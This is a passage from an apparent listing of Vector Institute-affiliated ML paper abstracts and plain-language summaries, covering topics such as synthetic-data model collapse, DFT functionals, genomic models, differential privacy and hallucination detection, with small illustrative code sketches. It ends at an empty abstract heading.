AI models are increasingly trained on (synthetic) data produced by earlier AI models. This can help when real data (human-written or human-labeled) is scarce, but it also creates a problem. Previous work has shown that if each new round keeps only the earlier model’s outputs that satisfy a single preference, the model can collapse: its outputs become less varied over time, and in the limit, their variance can shrink to zero.
We study a different way to choose synthetic data. Instead of using one fixed preference, we let the selection process switch between multiple preferences, such as different user tastes or different goals like quality, safety, and creativity. This small change has a large effect. Rather than concentrating on one narrow type of answer or image, the model can keep producing several kinds of desirable outputs.
Our paper gives mathematical conditions under which this happens and tests the idea in synthetic examples, image generation, and text generation. The results suggest that collapse is not an unavoidable consequence of training on synthetic data. It depends on how that data is selected. More pluralistic selection can preserve diversity while still improving the model.
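A toy simulation can make the contrast between single-preference and pluralistic curation tangible. The update rule below is an illustrative stand-in, not the paper's formal dynamics: at each round, every preference reweights the current distribution by `exp(reward)`, and the next model is the weighted mixture of those reweighted distributions. The two-outcome setup and all names are hypothetical.

```python
import numpy as np


def curate_step(p: np.ndarray, rewards: np.ndarray, weights: np.ndarray) -> np.ndarray:
    """One retraining round: mix the reward-tilted distributions of all preferences."""
    new_p = np.zeros_like(p)
    for w, r in zip(weights, rewards):
        tilted = p * np.exp(r)  # curation favours high-reward outputs
        new_p += w * tilted / tilted.sum()
    return new_p


def retrain(p0, rewards, weights, rounds: int) -> np.ndarray:
    """Iterate the curation step starting from distribution p0."""
    p = np.array(p0, dtype=float)
    rewards = np.asarray(rewards, dtype=float)
    weights = np.asarray(weights, dtype=float)
    for _ in range(rounds):
        p = curate_step(p, rewards, weights)
    return p


start = [0.3, 0.7]  # probabilities of two kinds of output

# One fixed preference that favours the first output.
single = retrain(start, rewards=[[1.0, 0.0]], weights=[1.0], rounds=200)

# Two preferences with opposite tastes, used equally often.
plural = retrain(start, rewards=[[1.0, 0.0], [0.0, 1.0]], weights=[0.5, 0.5], rounds=200)
```

In this toy model the single-preference run concentrates almost all probability on one output, while the two-preference run settles on a distribution that keeps both, mirroring the qualitative claim that collapse depends on how the data is selected.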
Derivative Informed Learning of Exchange-Correlation Functionals
Eike S. Eberhard, Luca Anthony Thiede, Abdulrahman Aldossary, Andreas Burger, Nicholas Gao, Vignesh Bhethanabotla, Alán Aspuru-Guzik (Vector Faculty Member), Stephan Günnemann
Abstract
Machine-learned (ML) XC functionals aim to replace human-designed density functional approximations by learning directly from reference data, but they still do not consistently outperform traditional $\mathcal{O}(N^4)$-scaling hybrid functionals. We therefore study a hybrid-distillation setting, where $\mathcal{O}(N^3)$-scaling semilocal ML-XC functionals are trained to reproduce B3LYP/def2-SVP targets. We introduce Derivative Informed XC-Loss (DI-Loss), a loss that incorporates additional information from the reference hybrid functional by supervising first and second derivatives of the energy on the Grassmannian of admissible density matrices. Rather than only matching the self-consistent fixed point, DI-Loss aligns the local first- and second-order response of the learned functional with that of the target functional. Across four evaluated architectures, DI-Loss consistently improves the main energy metrics. Averaged uniformly across architectures, the total-energy MAE decreases by 66% relative to energy and density supervision alone. The density-sensitive mean-field energy metric $E_\rho$ improves from 1.2 to 0.8 mEh on average, while dipole and $\mathcal{L}_2$ density errors do not improve uniformly. We further show that densities from the distilled functionals reduce hybrid-functional SCF iterations by up to 55%. In downstream TDDFT calculations, Hessian supervision improves excited-state predictions, with XCdiff reducing the mean excitation-energy MAE by 24-35% across molecule sizes on QM40.
Summary
Accurate computer simulations are an important tool for designing new molecules and materials, with applications ranging from drug discovery to batteries, catalysts, and sustainable chemicals. These simulations can predict properties before a compound is synthesized in the lab, but there is a persistent trade-off: the most accurate quantum-chemical methods are often too expensive to use at large scale, while cheaper methods can miss important effects.
This work uses machine learning to make high-quality chemistry calculations cheaper. We focus on density functional theory, one of the most widely used approaches in computational chemistry. In density functional theory, the main source of error is an approximation called the exchange-correlation functional, which determines how electrons interact beyond simple electrostatics. More accurate functionals, such as hybrid functionals, are useful but computationally expensive. Cheaper functionals are faster, but usually less accurate.
Our idea is to train a machine-learned functional to imitate a more expensive hybrid functional, so that it can provide similar predictions at substantially lower computational cost. Instead of only teaching the model to match final energies and electron densities, we also teach it how the reference calculation locally responds when the electron density is changed. In other words, the model learns not only the correct answer, but also the local shape of the quantum-mechanical energy landscape around that answer.
This additional derivative information makes the learned functional more reliable. Across several neural-network architectures, our derivative-informed training objective improves the main energy metrics compared with standard energy and density supervision. On average, it reduces total-energy errors by 66%. The learned functionals also produce electron densities that can be used to initialize more expensive hybrid-functional calculations, reducing the number of self-consistent solver iterations by up to 55%. This means that even when the expensive calculation is still needed, the machine-learned model can help reach the answer faster.
We also test whether the learned functionals capture information relevant beyond ground-state energies. In time-dependent density functional theory, which is used to predict optical and excited-state properties, the curvature of the energy functional is crucial. By supervising this curvature during training, our method improves excited-state predictions, reducing excitation-energy errors by 24–35% in our experiments.
Overall, this work shows how machine learning can distill expensive quantum-chemical models into cheaper ones while preserving important physical behavior. This could make accurate molecular and materials modelling more practical for large-scale screening tasks, such as searching for better drug candidates, catalysts, or functional materials.
TLDR: We train XC-functionals by supervising energy gradients on the manifold of density matrices and distill hybrid functionals
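The idea of supervising derivatives as well as values can be illustrated with a one-dimensional analogue. The sketch below is not DI-Loss itself, which operates on the Grassmannian of density matrices. It assumes a polynomial model, a sine target, and hypothetical weights `w_grad` and `w_hess` for the first- and second-derivative terms.

```python
import math

def poly_and_derivs(coeffs, x):
    """Value, first and second derivative of c0 + c1*x + c2*x^2 + ... at x."""
    g = sum(c * x**k for k, c in enumerate(coeffs))
    g1 = sum(k * c * x**(k - 1) for k, c in enumerate(coeffs) if k >= 1)
    g2 = sum(k * (k - 1) * c * x**(k - 2) for k, c in enumerate(coeffs) if k >= 2)
    return g, g1, g2

def loss(coeffs, xs, w_grad=0.0, w_hess=0.0):
    """Mean squared error against sin(x), optionally adding derivative terms."""
    total = 0.0
    for x in xs:
        g, g1, g2 = poly_and_derivs(coeffs, x)
        total += (g - math.sin(x)) ** 2            # match the value
        total += w_grad * (g1 - math.cos(x)) ** 2  # match the slope
        total += w_hess * (g2 + math.sin(x)) ** 2  # match the curvature
    return total / len(xs)

xs = [-math.pi, 0.0, math.pi]  # sin(x) is (numerically almost) zero here
flat = [0.0]                   # the constant model g(x) = 0

print("value-only loss:        ", loss(flat, xs))
print("derivative-informed loss:", loss(flat, xs, w_grad=1.0, w_hess=1.0))
```

The constant model matches the target values at the sample points almost perfectly, so a value-only loss cannot tell it apart from a good fit. The derivative terms expose that its local response is wrong.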
Discretized Density-Guided Source-Free Adaptation for Continuous Targets
Spotlight paper
Gezheng Xu, Qi Chen, Qiuhao Zeng, Charles X. Ling, Boyu Wang (Vector Faculty Affiliate)
Abstract
Source-Free Domain Adaptation (SFDA) enables model adaptation under distribution shifts without access to source data, providing a practical solution for privacy-sensitive applications and having shown substantial progress in classification. In contrast, regression involves ordered and continuous target variables, posing unique challenges for representation adaptation and pseudo-label refinement in the SFDA setting. To address this gap, we propose a novel algorithm for continuous target prediction in SFDA that leverages instance-dependent, discretized density–informed supervisory signals to refine pseudo-labels within an uncertainty-aware paradigm. By incorporating auxiliary discretized distribution learning, our method also promotes more compact and structured feature representations, mitigating the inherent difficulties of adapting regression models under distribution shift. We theoretically demonstrate that the resulting density structure is robust to potential perturbations, supporting reliable SFDA for regression. Extensive experiments across multiple benchmarks validate the effectiveness of the proposed approach.
Summary
When an AI model trained on one dataset is applied to a new, different setting, its performance often drops because the data no longer look like the training data, a problem known as distribution shift. In many real-world applications, such as healthcare and manufacturing, retraining the model is not an option because the original training data may be private or unavailable, and the new data lacks labels. This problem is especially difficult for tasks that predict continuous values (like a patient’s age or a machine’s remaining lifespan), rather than choosing from a fixed set of categories. We developed MERCI, a method that helps models adapt to new environments without accessing the original data or any labels. MERCI works by converting the model’s uncertain predictions into a histogram (a simple bar-chart-like representation of where the true value is likely to fall) and uses this to generate better-calibrated guidance for the model to learn from. Our experiments across diverse tasks show that MERCI consistently improves prediction accuracy after adaptation, offering a practical and privacy-respecting solution for deploying regression models in changing real-world conditions.
dnaHNet: A Scalable and Hierarchical Foundation Model for Genomic Sequence Learning
Spotlight paper
Arnav Shah, Junzhe Li, Parsa Idehpour, Adibvafa Fallahpour, Brandon Wang, Sukjun Hwang, Bo Wang (Vector Faculty Member), Patrick Hsu, Hani Goodarzi, Albert Gu
Abstract
Genomic foundation models have the potential to decode DNA syntax, yet face a fundamental tradeoff. Standard subword tokenizers fragment biologically meaningful motifs such as codons and regulatory elements, while nucleotide-level models preserve biological coherence but incur prohibitive computational costs for long contexts. We introduce dnaHNet, a state-of-the-art tokenizer-free autoregressive model that segments and models genomic sequences end to end. Using a differentiable dynamic chunking mechanism, dnaHNet compresses raw nucleotides into latent tokens adaptively, balancing compression with predictive accuracy. Pretrained on prokaryotic genomes, dnaHNet outperforms leading architectures including StripedHyena2 in scaling and efficiency. This recursive chunking yields quadratic FLOP reductions, enabling $>3 \times$ inference speedup over Transformers. On zero-shot tasks, dnaHNet achieves superior performance in predicting protein variant fitness and gene essentiality, while automatically discovering hierarchical biological structures without supervision. These results establish dnaHNet as a scalable, interpretable framework for next-generation genomic modeling.
Summary
DNA contains instructions that help determine how living organisms grow, function, and respond to changes. Recent AI models can learn patterns in DNA, but they face a difficult tradeoff: reading DNA one letter at a time preserves biological meaning but is slow and expensive, while chopping DNA into fixed “words” can break apart meaningful biological units.
We developed dnaHNet, an AI model that learns how to group DNA letters on its own instead of relying on a fixed vocabulary. As it reads raw DNA sequences, dnaHNet dynamically compresses nearby letters into larger learned pieces, allowing it to keep important biological structure while making long DNA sequences easier to process.
In experiments on microbial genomes, dnaHNet was faster and more efficient than strong existing models, while also performing well on tasks such as predicting the effects of protein mutations and identifying genes that are essential for survival. Because the model also learns meaningful biological groupings without being explicitly told what to look for, dnaHNet offers a scalable and more interpretable path toward AI systems that can help researchers understand genomes.
TLDR: HNet architectures scale better and perform better on relevant downstream biological evaluations than SOTA genomic foundation models.
Efficient Public Verification of Private ML via Regularization
Zoë R Bell, Anvith Thudi, Olive Franzese-McLaughlin, Nicolas Papernot (Vector Faculty Member), Shafi Goldwasser
Abstract
Training with differential privacy (DP) guarantees dataset members that they cannot be identified by users of the released model. However, those data providers, and, in general, the public, lack methods to efficiently verify that models trained on their data satisfy DP guarantees. The amount of compute needed to verify DP guarantees for current algorithms scales with the amount of computation required to train the model. In this paper we design the first DP algorithm with near optimal privacy-utility trade-offs but whose DP guarantees can be verified cheaper than training. We focus on DP stochastic convex optimization (DP-SCO), where optimal privacy-utility trade-offs are known. Here we show we can obtain tight privacy-utility trade-offs by privately minimizing a series of regularized objectives and only using the standard DP composition bound. Crucially, this method can be verified with much less compute than training. This leads to the first known DP-SCO algorithm with near optimal privacy-utility whose DP verification scales better than training cost, significantly reducing verification costs on large datasets.
Summary
Machine learning models can reveal sensitive information about the individuals whose data the model was trained on. The standard approach to ensuring a model does not reveal information about these individuals is to use specially designed training algorithms, but the public lacks tools to verify a model was trained using such an algorithm. In this paper we explore how we might design these private training algorithms so that it is also easy for the public to verify they were used. This led us to an algorithm which kept the optimal utility guarantees of past algorithms, but drastically decreased the time it takes for verification. In doing so, we made progress towards enabling the public to verify how their information is being used by entities training models.
TLDR: We provide the first known DP-SCO algorithm with near optimal privacy-utility whose DP verification scales better than training cost
Embedding Trust: Semantic Isotropy Predicts Nonfactuality in Long-Form Text Generation
Dhrupad Bhardwaj, Julia Kempe, Tim G. J. Rudner (incoming Vector Faculty Member)
Abstract
To deploy large language models (LLMs) in high-stakes application domains that require substantively accurate responses to open-ended prompts, we need reliable, computationally inexpensive methods that assess the trustworthiness of long-form responses generated by LLMs. However, existing approaches often rely on claim-by-claim fact-checking, which is computationally expensive and brittle in long-form responses to open-ended prompts. In this work, we introduce semantic isotropy—the degree of uniformity across normalized text embeddings on the unit sphere—and use it to assess the trustworthiness of long-form responses generated by LLMs. To do so, we generate several long-form responses, embed them, and estimate the level of semantic isotropy of these responses as the angular dispersion of the embeddings on the unit sphere. We find that higher semantic isotropy—that is, greater embedding dispersion—reliably signals lower factual consistency across samples. Our approach requires no labeled data, no fine-tuning, and no hyperparameter selection, and can be used with open- or closed-weight embedding models. Across multiple domains, our method consistently outperforms existing aggregate trust signals in predicting nonfactuality using only a handful of samples, offering a practical, low-cost first-pass signal that complements claim-level verification in real-world LLM workflows.
Summary
Large language models are increasingly used to produce long, free-form answers in settings where factual accuracy is essential. This raises a practical question: how can we tell whether such an answer is trustworthy or whether the model is fabricating? The most reliable existing checks are computationally expensive, decomposing each answer into individual claims and verifying every claim against a trusted reference, which can require hundreds of model queries per response.
We propose a substantially cheaper alternative. We prompt the model to answer the same question several times and convert each response into a numerical representation of its meaning via a separate embedding model. When the model is on firm ground, these representations align closely; when it is uncertain or fabricating, they tend to diverge. The degree of divergence yields a simple score, and we show that greater divergence reliably indicates lower factual accuracy.
The approach requires no labelled data, no additional training, and no manual tuning, and is compatible with any standard text-representation model. We additionally introduce a more efficient procedure for grading the factual accuracy of long responses and release a large annotated dataset. Together, these contributions provide a low-cost, scalable signal for flagging unreliable model output before deployment.
TLDR: We introduce Semantic Isotropy, a geometry-inspired metric for assessing the trustworthiness of long-form language model outputs, and demonstrate its effectiveness and robustness across diverse models and evaluation settings.
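A minimal sketch of a dispersion score of this kind follows. The paper's exact estimator is not given here, so the sketch assumes one simple choice: one minus the mean pairwise cosine similarity of the normalized embeddings. The embedding vectors are made up for illustration and would in practice come from an embedding model.

```python
import math

def normalize(v):
    """Project a vector onto the unit sphere."""
    n = math.sqrt(sum(x * x for x in v))
    return [x / n for x in v]

def angular_dispersion(embeddings):
    """1 minus the mean pairwise cosine similarity of the normalized embeddings.

    Assumption: this is one plausible dispersion measure, not necessarily
    the estimator used in the paper.
    """
    unit = [normalize(v) for v in embeddings]
    sims = []
    for i in range(len(unit)):
        for j in range(i + 1, len(unit)):
            sims.append(sum(a * b for a, b in zip(unit[i], unit[j])))
    return 1.0 - sum(sims) / len(sims)

# Hypothetical embeddings of three sampled responses to the same prompt.
consistent = [[1.0, 0.1, 0.0], [0.9, 0.0, 0.1], [1.0, 0.05, 0.05]]
scattered = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]

print("consistent responses:", angular_dispersion(consistent))
print("scattered responses: ", angular_dispersion(scattered))
```

Responses that agree in meaning yield a score near zero, while mutually orthogonal responses yield a score of one, which under the paper's finding would flag a higher risk of nonfactual content.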
Exploiting weight-space symmetries for approximating curvature
Artem Artemev, Rui Xia, Benjamin M. Boyd, Youjing Yu, Felix Dangel (former Vector Distinguished Postdoctoral Fellow), Guillaume Hennequin, Alberto Bernacchia
Abstract
Many machine learning techniques rely on approximating a loss function’s curvature, but this is notoriously hard to do at the scale of modern deep networks. Surprisingly, no previous work has exploited the curvature constraints that arise from well known weight-space symmetries in loss landscapes. By analytically averaging over group actions that leave the loss invariant, we construct structured Hessian approximations from single gradients that can be tractably estimated, stored, and inverted. The choice of user-specified symmetry group directly governs the trade-off between approximation accuracy and computational cost. Moreover, our framework provides a unifying theoretical lens for viewing existing methods; in particular, a specific choice of symmetry group recovers Shampoo/Muon-like curvature estimates. We validate our method on a range of network architectures, and deploy it to second-order optimization benchmarks, including a small language model. Our curvature estimation framework might find applications in other machine learning problems such as uncertainty estimation, continual learning, compression/pruning, training data attribution, and more.
Summary
Training neural networks faster requires knowing not just the direction to update parameters (the gradient), but also the curvature of the loss landscape. Computing this curvature exactly is infeasible for large models. We observe that neural networks have built-in symmetries. For instance, swapping two neurons and their connections leaves the network unchanged. From a single gradient, these symmetries let us analytically infer gradients at many equivalent configurations, and we show how to distill this information into a curvature estimate. Larger symmetry groups yield cheaper but coarser estimates; smaller groups yield richer ones. We prove that a specific middle-ground choice produces updates mathematically equivalent to Shampoo and Muon, two popular optimizers, revealing a previously unknown connection between these methods and the network’s architectural symmetries.
TLDR: Approximation of curvature exploiting weight-space symmetries
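The neuron-swapping symmetry mentioned in the summary is easy to check numerically. The sketch below only demonstrates the invariance, not the curvature estimator built on top of it. The network shape, weights, and helper names are illustrative assumptions.

```python
import math

def mlp(x, w1, b1, w2):
    """One-hidden-layer network with tanh units and a scalar output."""
    hidden = [
        math.tanh(sum(w * xi for w, xi in zip(row, x)) + b)
        for row, b in zip(w1, b1)
    ]
    return sum(w * h for w, h in zip(w2, hidden))

def swap_neurons(w1, b1, w2, i, j):
    """Swap hidden units i and j with their incoming and outgoing weights."""
    w1, b1, w2 = [row[:] for row in w1], b1[:], w2[:]
    w1[i], w1[j] = w1[j], w1[i]  # incoming weights
    b1[i], b1[j] = b1[j], b1[i]  # biases
    w2[i], w2[j] = w2[j], w2[i]  # outgoing weights
    return w1, b1, w2

# Arbitrary example parameters: 2 inputs, 3 hidden units.
w1 = [[0.5, -1.0], [1.5, 0.3], [-0.7, 0.8]]
b1 = [0.1, -0.2, 0.05]
w2 = [1.0, -2.0, 0.5]
x = [0.4, -1.2]

original = mlp(x, w1, b1, w2)
permuted = mlp(x, *swap_neurons(w1, b1, w2, 0, 2))
print(original, permuted)
```

The two outputs agree up to floating-point rounding, even though the parameter vectors differ. Any loss computed from the network output is therefore unchanged by the swap.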
Fair Dataset Distillation via Cross-Group Barycenter Alignment
Mohammad Hossein Moslemi, Nima Hosseini Dashtbayaz, Zhimin Mei, Boyu Wang (Vector Faculty Affiliate), Bissan Ghaddar
Abstract
Dataset Distillation aims to compress a large dataset into a small synthetic one while maintaining predictive performance. We show that as different demographic groups exhibit distinct predictive patterns, the distillation process struggles to simultaneously preserve informative signals for all subgroups, regardless of whether group sizes are mildly or severely imbalanced. Consequently, models trained on distilled data can experience substantial performance drops for certain subgroups, leading to fairness gaps. Crucially, these gaps do not disappear by merely correcting group imbalance, since they stem from fundamental mismatches in subgroup predictive patterns rather than from sample-size disparities alone. We therefore formally analyze the interaction between these two sources of bias and cast the solution as identifying a group-imbalance-agnostic barycenter of the predictive information that induces similar representations across all subgroups. By distilling toward this shared aggregate representation, we show that group fairness concerns can be reduced. Our approach is compatible with existing distillation methods, and empirical results show that it substantially reduces bias introduced by dataset distillation. Code is available at https://github.com/mhmoslemi/COBRA.
Summary
Modern AI training often needs huge datasets, which is expensive in storage and compute. Dataset distillation solves this by compressing a large dataset into a tiny synthetic one that trains models just as well. However, we discovered that this compression can quietly amplify unfairness: models trained on distilled data can perform much worse for minority demographic groups than models trained on the original data.
We traced the problem to how distillation builds its target. Standard methods average across all samples, which lets majority groups dominate and pushes minority patterns out of the compressed dataset. We show that this bias is not just about group sizes; it also depends on how different demographic groups are positioned in the model’s internal representation space, and we formalize this through an upper bound on the resulting fairness gap.
Our method, COBRA, computes a balanced center point that stays equally close to every demographic group, then distills the synthetic dataset toward that fair target instead. Across seven benchmarks and four distillation methods, COBRA reduces fairness gaps substantially while preserving or improving accuracy.
As compressed datasets become common in sensitive areas like healthcare and finance, COBRA helps ensure these efficiency gains do not come at the cost of fairness for underrepresented groups.
TLDR: We propose a fairness-aware dataset distillation method targeting cross-group shared signals, reducing representational conflict and lowering equalized odds difference on fairness benchmarks, with strong cross-architecture generalization.
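The difference between a sample-averaged target and a group-balanced one can be seen in a small example. This is a sketch under simplifying assumptions, not COBRA's actual objective: it uses made-up two-dimensional features for two groups and takes the equal-weight Euclidean barycenter, which is the mean of the group means.

```python
def mean(points):
    """Coordinate-wise mean of a list of points."""
    n = len(points)
    return [sum(p[d] for p in points) / n for d in range(len(points[0]))]

def sq_dist(a, b):
    """Squared Euclidean distance."""
    return sum((x - y) ** 2 for x, y in zip(a, b))

# Hypothetical feature vectors: 8 majority samples, 2 minority samples.
majority = [[0.0, 0.0], [2.0, 0.0]] * 4
minority = [[9.0, 0.0], [11.0, 0.0]]

mu_major, mu_minor = mean(majority), mean(minority)

pooled = mean(majority + minority)    # every sample counts equally
balanced = mean([mu_major, mu_minor])  # every group counts equally

for name, target in [("pooled", pooled), ("balanced", balanced)]:
    print(name, target,
          "dist to majority:", sq_dist(target, mu_major),
          "dist to minority:", sq_dist(target, mu_minor))
```

The pooled target sits close to the majority group, so a distilled set matched to it carries little of the minority pattern. The balanced target is equidistant from both group means in this two-group case.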
FedLog: Personalized Federated Classification with Less Communication and More Flexibility
Haolin Yu, Guojun Zhang, Hongliang Li, Pascal Poupart (Vector Faculty Member)
Abstract
Federated representation learning (FRL) aims to learn personalized federated models with effective feature extraction from local data. FRL algorithms that share the majority of the model parameters face significant challenges with huge communication overhead. This overhead stems from the millions of neural network parameters and slow aggregation progress of the averaging heuristic. To reduce the overhead, we propose FedLog, which shares sufficient data summaries instead of raw model parameters. The data summaries encode minimal sufficient statistics of an exponential family, and Bayesian inference is utilized for global aggregation. FedLog helps reduce message sizes and communication frequency. We prove that the shared messages are minimal sufficient statistics and theoretically analyze the convergence rate of FedLog. To further ensure formal privacy guarantees, we extend FedLog with the differential privacy framework. Empirical results demonstrate high learning accuracy with low communication overhead of our method.
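The general principle of sharing sufficient statistics instead of parameters can be sketched with a textbook conjugate model. This is not FedLog's actual message format or model. It assumes scalar Gaussian observations with known noise variance and a Gaussian prior on the mean, and all names are illustrative.

```python
def summarize(xs):
    """Sufficient statistics for a Gaussian mean with known variance."""
    return (len(xs), sum(xs))

def posterior(summaries, prior_mean=0.0, prior_var=100.0, noise_var=1.0):
    """Conjugate Gaussian posterior over the mean, from summed statistics."""
    n = sum(s[0] for s in summaries)
    total = sum(s[1] for s in summaries)
    precision = 1.0 / prior_var + n / noise_var
    mean = (prior_mean / prior_var + total / noise_var) / precision
    return mean, 1.0 / precision

# Hypothetical local datasets held by three clients.
clients = [[1.0, 2.0, 3.0], [4.0, 5.0], [6.0, 7.0, 8.0, 9.0]]

# Each client sends two numbers, regardless of how much data it holds.
messages = [summarize(xs) for xs in clients]
federated = posterior(messages)

# Reference: the posterior a central server would get from all raw data.
pooled = [x for xs in clients for x in xs]
centralized = posterior([summarize(pooled)])

print("federated:  ", federated)
print("centralized:", centralized)
```

Because the statistics are sufficient, the server recovers the same posterior it would have computed from the raw data, while each message stays a fixed, small size.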
Few-Shot Design Optimization By Exploiting Auxiliary Information
Arjun Mani, Carl Vondrick, Richard Zemel (Vector Faculty Member)
Abstract
Many real-world design problems involve optimizing an expensive black-box function f(x), for which Bayesian Optimization is a sample-efficient framework. However, while the basic black-box setting returns a scalar reward, real-world experiments often generate a wealth of useful information. We introduce a new setting where an experiment generates high-dimensional auxiliary information h(x) along with f(x); moreover, a history of relevant, previously-solved tasks is available for accelerating optimization. We develop a novel method based on a neural model which predicts f(x) for unseen designs given a few-shot context containing observations of h(x). We evaluate our method on two challenging domains, robotic hardware design and hyperparameter tuning. On both domains, our method achieves improved few-shot prediction and faster design optimization, outperforming several multi-task optimization methods.
Summary
Design problems are ubiquitous across engineering and the natural sciences. For instance, a biologist may want to design a drug that binds as tightly as possible to a pathogen, and a roboticist might want to design a robot arm that can grasp objects delicately and stably. Often, designing good solutions involves running real-world experiments, e.g. a wet-lab experiment to test drug binding. This experiment is a “black-box”, where you can put in a design, and you get out a number measuring how well the design performed. The goal is to optimize this metric with as few experiments as possible.
A number of AI methods exist that intelligently decide which design to try next, based on the experiments that have come before. However, this basic “black-box” setting, which only returns a single number measuring a design, is highly simplified. Modern scientific or engineering labs have advanced experimental capabilities that can make several observations about a system. For instance, in robot design, trying out a robot arm may generate a high volume of sensor data (from cameras or tactile sensors) along with a final performance measure of the design. Therefore, we introduce a new optimization setting, where a trial generates high-dimensional “extra information” along with the number measuring performance. This extra information can be very useful for understanding not just that a design fails, but *how* exactly the design fails and how it could be altered to succeed.
We introduce a novel AI method for this setting. This method involves a neural network model, which is trained on a history of design tasks that have already been solved. It learns how to take in a small set of evaluated designs for a task, which includes observations of this ‘extra information’, and predict which un-evaluated designs might have high reward and should be tried out. After being trained, this model can be applied to a new design task, where it iteratively predicts which design to try next, and tries out that design, repeating until a satisfactory design is found.
We apply our method to multiple design problems. One problem involves designing robotic grippers whose shape must be customized to grasp specific objects (e.g. a bottle). Each time the gripper makes contact with the object, it gets ‘extra’ tactile feedback along with a reward for the grasp. We show that our method can grasp new objects that it did not see during training, and can quickly optimize the gripper design for the object after only a few interactions with that object. It finds successful gripper designs for a new object significantly faster than current methods. Thus, our work takes a step towards more capable systems for AI-driven design, which can conduct effective design and discovery in realistic scientific and engineering environments.
TLDR: We introduce a new design optimization setting where a trial provides high-dimensional auxiliary information beyond reward, and propose a novel approach for this setting.
FiGuRO – Intrinsic Dimension Estimation for Multi-Modal Data
Viktoria Schuster, Sana Tonekaboni (Vector Distinguished Postdoctoral Fellow), Caroline Uhler
Abstract
Determining the complexity, or Intrinsic Dimension (ID), of data is fundamental to efficient and interpretable representation learning. This is particularly challenging in multi-modal settings when trying to learn disentangled representations for shared and private information. Existing techniques leave a critical gap: they are often static, uni-modal, or in the case of contrastive methods, adapt only to the shared ID implicitly. We introduce Fidelity-Guided Rank Optimization (FiGuRO), a framework for approximating the ID of uni- and multi-modal data under constraints of model capacity and hyperparameters. FiGuRO learns the dimensions of low-rank projections using truncated singular value decomposition and an algorithm that determines when to reduce or increase dimension and in which latent space. Disentanglement of shared and private information arises as an emergent property of this optimization, eliminating the need for complex auxiliary loss functions. We demonstrate that FiGuRO outperforms existing ID estimation techniques and is more robust to hyperparameter changes. Across simulations and real-world data, FiGuRO captures distinct ID scales and varying subspace ratios, and decomposes shared and private information successfully. Furthermore, we show that FiGuRO can be applied to modern uni-modal pretrained models, enabling efficient, post-hoc disentanglement of multi-modal representations.
Summary
Modern AI models often learn from multiple sources (modalities) simultaneously, such as combining a patient’s medical scans with their genetic data. To make these models efficient and trustworthy, scientists must find their true underlying complexity (the absolute minimum number of factors needed to describe the data). However, existing tools struggle to differentiate between information shared across sources and details unique to just one.
To solve this, we developed a framework called FiGuRO that automatically estimates the complexity of both shared and unique information streams in a single step. The central algorithm expands or shrinks FiGuRO’s representations based on how perfectly it can reconstruct the original data. As it balances this process, FiGuRO untangles shared concepts from modality-specific details.
We demonstrate FiGuRO’s success on diverse datasets, including paired audio-image digits and complex biological measurements. By revealing precisely how much new information each source contributes, FiGuRO helps researchers determine if collecting difficult or expensive data is truly worthwhile. Ultimately, this makes multi-source AI systems more lightweight and transparent.
TLDR: We present FiGuRO, a framework that estimates the intrinsic dimension of multi-modal data by optimizing rank via SVD in disentangled latent spaces under a fidelity constraint.
FlexRank: Nested Low-Rank Knowledge Decomposition for Adaptive Model Deployment
Spotlight paper
Riccardo Zaccone, Stefanos Laskaridis, Marco Ciccone (Vector Distinguished Postdoctoral Fellow), Samuel Horváth
Abstract
The growing scale of deep neural networks, encompassing large language models (LLMs) and vision transformers (ViTs), has made training from scratch prohibitively expensive and deployment increasingly costly. These models are often used as computational monoliths with fixed cost, hindering adaptive deployment across different cost budgets.
We argue that nested components, ordered by importance, can be extracted from pretrained models and selectively activated within the available computational budget. To this end, our proposed FlexRank method leverages low-rank weight decomposition with nested, importance-based consolidation to extract submodels of increasing capabilities. Our approach enables a _“train-once, deploy-everywhere”_ paradigm offering a graceful trade-off between cost and performance without training from scratch for each budget – advancing practical deployment of large models.
Summary
Modern AI models can be powerful, but they are often expensive to run: the same large model is usually used whether a device has abundant computing power or very little. This makes deployment inefficient, especially across phones, laptops, servers, and applications where some inputs are easier than others. We introduce FlexRank, a method that turns one pretrained AI model into a family of smaller and larger versions that all share the same underlying weights. The key idea is to break the model’s knowledge into ordered pieces, so the most important pieces are used first and additional pieces can be added when more computation is available. After identifying these nested pieces, FlexRank refines them by teaching every smaller version to imitate the original full model. This creates a “train once, deploy everywhere” model that can smoothly trade accuracy for speed or memory without training and storing many separate models. We show that this works across language models and vision models, including large transformers. FlexRank could make advanced AI easier to deploy on diverse hardware while reducing unnecessary computation.
TLDR: A method to decompose large pretrained models into nested low-rank adaptive models
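The nesting idea can be sketched with a weight matrix written as a sum of rank-one pieces ordered by importance. How FlexRank obtains and refines these pieces is not shown. The sketch assumes hand-picked orthonormal factors and importance scores purely for illustration.

```python
import math

def outer(u, v, scale):
    """Rank-one matrix scale * u v^T."""
    return [[scale * ui * vj for vj in v] for ui in u]

def truncated(components, rank):
    """Sum the first `rank` pieces; smaller submodels are prefixes of larger ones."""
    rows, cols = len(components[0][1]), len(components[0][2])
    w = [[0.0] * cols for _ in range(rows)]
    for s, u, v in components[:rank]:
        piece = outer(u, v, s)
        for i in range(rows):
            for j in range(cols):
                w[i][j] += piece[i][j]
    return w

def frob_error(a, b):
    """Frobenius norm of a - b."""
    return math.sqrt(sum((x - y) ** 2 for ra, rb in zip(a, b) for x, y in zip(ra, rb)))

r = 1.0 / math.sqrt(2.0)
# (importance, left factor, right factor), sorted by decreasing importance.
components = [
    (3.0, [1.0, 0.0, 0.0], [r, r, 0.0]),
    (2.0, [0.0, 1.0, 0.0], [r, -r, 0.0]),
    (1.0, [0.0, 0.0, 1.0], [0.0, 0.0, 1.0]),
]

full = truncated(components, 3)
errors = [frob_error(full, truncated(components, k)) for k in (1, 2, 3)]
print("approximation error by rank:", errors)
```

Every budget reuses the same stored factors, and adding the next piece can only shrink the gap to the full matrix. That is the property a "train once, deploy everywhere" model relies on.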
Frequentist Consistency of Prior-Data Fitted Networks for Causal Estimation
Valentyn Melnychuk, Vahid Balazadeh, Stefan Feuerriegel, Rahul G. Krishnan (Vector Faculty Member)
Abstract
